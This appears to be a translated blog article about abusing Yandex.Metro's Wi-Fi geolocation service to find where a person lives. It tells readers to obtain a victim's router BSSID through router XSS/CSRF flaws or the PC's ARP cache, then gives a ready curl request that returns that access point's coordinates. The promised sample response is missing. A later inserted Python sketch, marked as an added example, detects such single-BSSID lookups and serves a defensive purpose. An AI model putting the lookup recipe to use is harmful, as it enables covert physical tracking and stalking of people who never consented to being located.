We spy on everyone with Yandex.Metro

    Since Yandex apparently is not going to close its spyware "bug", let us actively use it.

    The ability to determine the user's physical location can sometimes be very useful if you are an employee of the Ministry of Truth, a collector, or just a criminal element.

    To do this, use a known XSS or CSRF vulnerability in the firmware of the home router (one, two, three, etc.) to determine the MAC address of the user's router (it will also be the BSSID of the Wi-Fi network). If you have direct access to the user's PC, just look at the ARP cache on the PC with the "arp -a" command. Typically, the first line in the cache is the MAC address of the default gateway, which will be the desired BSSID.

    The received BSSID can be inserted into the request that Yandex.Metro sends:

    curl -i -s -k -X 'POST' \
    -H 'User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.0.1; Nexus 5 Build/LRX22C)' -H 'Content-Type: application/x-www-form-urlencoded' \
    'http://mobile.maps.yandex.net/cellid_location/?clid=1866854&lac=-1&cellid=-1&operatorid=null&countrycode=null&signalstrength=-1&wifinetworks=EE43F6D1B690:-65&app=ymetro'

    After which we will get this answer:

    The response packet contains the coordinates of the requested Wi-Fi access point, carefully collected and stored by Yandex. You can enter them into Google Maps and find the house you need. The coordinates are not always accurate, but they will work as a starting point for a search.
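
    Seen from the side of the location service, the request above has a recognizable shape: no cell data (lac=-1, cellid=-1) and exactly one BSSID. The following is an added example, not code from the original article or from Yandex: a sketch of a server-side check that parses the query string and flags such lookups. The function names, the comma separator between several wifinetworks entries, the assumption that a genuine client scan usually reports several access points, and every sample request other than the article's own are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

BSSID_RE = re.compile(r"[0-9A-Fa-f]{12}")  # MAC without separators, as in the request
RSSI_RE = re.compile(r"-?\d+")

def parse_wifinetworks(value):
    """Return [(bssid, rssi)] from 'BSSID:rssi[,BSSID:rssi...]', skipping bad items.
    The comma between entries is an assumption; the article shows one entry only."""
    nets = []
    for item in value.split(","):
        bssid, sep, rssi = item.partition(":")
        if sep and BSSID_RE.fullmatch(bssid) and RSSI_RE.fullmatch(rssi):
            nets.append((bssid.upper(), int(rssi)))
    return nets

def classify(url):
    """Heuristic: 'flag' lookups that ask for the position of one BSSID alone."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    get = lambda key: q.get(key, [""])[0]
    nets = parse_wifinetworks(get("wifinetworks"))
    has_cell = get("lac") not in ("", "-1") and get("cellid") not in ("", "-1")
    if not nets and not has_cell:
        return "reject"  # no usable measurement at all
    if len(nets) == 1 and not has_cell:
        return "flag"    # single AP, no cell context: the shape of the request above
    return "ok"          # several APs and/or cell data (assumed typical of a real scan)

BASE = "http://mobile.maps.yandex.net/cellid_location/?clid=1866854&app=ymetro"
# Constructed sample requests; every BSSID except the article's own is made up.
SAMPLES = [
    BASE + "&lac=-1&cellid=-1&wifinetworks=EE43F6D1B690:-65",
    BASE + "&lac=-1&cellid=-1&wifinetworks=02AABBCCDD01:-48,02AABBCCDD02:-71",
    BASE + "&lac=7701&cellid=40213&wifinetworks=02AABBCCDD01:-60",
    BASE + "&lac=-1&cellid=-1&wifinetworks=not-a-mac",
]

def run():
    """Classify every constructed sample request, in order."""
    return [classify(url) for url in SAMPLES]

if __name__ == "__main__":
    for url, verdict in zip(SAMPLES, run()):
        print(f"{verdict:6} {url.split('?', 1)[1]}")
```
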

    Another interesting feature: the example uses the MAC address of a router in Krasnodar (~1500 km to the metro). I hope this is a sign that we will have a subway soon!
